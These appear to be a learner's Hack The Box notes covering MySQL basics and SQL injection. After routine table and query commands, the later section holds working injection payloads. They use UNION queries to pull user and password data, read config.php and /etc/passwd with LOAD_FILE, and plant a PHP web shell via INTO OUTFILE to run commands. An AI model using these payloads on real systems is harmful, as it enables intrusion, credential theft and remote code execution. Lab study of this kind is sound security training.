mysql

Apache's configuration found at /etc/apache2/apache2.conf

Nginx's configuration at /etc/nginx/nginx.conf

IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config

mysql -u root -p

mysql -u root -p<password>

mysql -u root -h docker.hackthebox.eu -P 3306 -p 

CREATE DATABASE users;

CREATE TABLE logins (
    id INT,
    username VARCHAR(100),
    password VARCHAR(100),
    date_of_joining DATETIME
    );
    
CREATE TABLE logins (
    id INT NOT NULL AUTO_INCREMENT,
    username VARCHAR(100) UNIQUE NOT NULL,
    password VARCHAR(100) NOT NULL,
    date_of_joining DATETIME DEFAULT NOW(),
    PRIMARY KEY (id)
    );

# Will display the details of that table such as fields and data types
DESCRIBE logins;

# Auto increment and don't have any duplicate
id INT NOT NULL AUTO_INCREMENT,

# Return date and time
date_of_joining DATETIME DEFAULT NOW(),

# Skip the ssl verification
mysql -u root -h 94.237.61.84 -P 59610 -p --skip-ssl

INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);

INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');

INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');

show databases;

use database1;

show tables;

SELECT * FROM table_name;

SELECT column1, column2 FROM table_name;

# Remove table
DROP TABLE logins;

ALTER TABLE logins ADD newColumn INT;

# Rename a column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;

# Change the datatype of a column
ALTER TABLE logins MODIFY oldColumn DATE;

# Remove a column
ALTER TABLE logins DROP oldColumn;

# Update a column
UPDATE logins SET password = 'change_password' WHERE id > 1;

# Arrange the result
SELECT * FROM logins ORDER BY password;

# Asc or Desc
SELECT * FROM logins ORDER BY password DESC;

SELECT * FROM logins ORDER BY password DESC, id ASC;

# Limiting the result
SELECT * FROM logins LIMIT 2;

# Select only 2, 3
# It will return id 2 and 3 since the id 1 starts with 0 
# It's like array
SELECT * FROM logins LIMIT 1, 2;

SELECT * FROM logins WHERE id > 1;

SELECT * FROM logins where username = 'admin';

# Select result like admin
SELECT * FROM logins WHERE username LIKE 'admin%';

# Seletct result that has 3 characters
SELECT * FROM logins WHERE username like '___';

SELECT 1 = 1 AND 'test' = 'test';
SELECT 1 = 1 && 'test' = 'abc';

SELECT 1 = 1 OR 'test' = 'abc';
SELECT 1 = 1 || 'test' = 'abc';

# It will return 0 means true
SELECT NOT 1 = 1;
SELECT 1 != 1;

# It will return 1 means false
SELECT NOT 1 = 2;

SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;
SELECT * FROM logins WHERE username != 'tom' AND id > 3 - 2;

# Quizzes 

select * from titles where emp_no > 10000 or title !='engineer';

select first_name,last_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';

select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;

' UNION select 1,user(),3,4-- -

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
/shell.php?0=cat ../flag.txt

# Union 
UNION SELECT username, 2, 3, 4 from passwords-- '

# This will display the privilege of the current db user
SELECT super_priv FROM mysql.user

# Displays the file /etc/passwd
SELECT LOAD_FILE('/etc/passwd');

# If it is an empty value means that we can read files anywhere in the system
# But if the value is NULL we can't do anything in the system
# We can read files if the user have a FILE privilege
SHOW VARIABLES LIKE 'secure_file_priv';

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

SELECT * from users INTO OUTFILE '/tmp/credentials';

cat /tmp/credentials;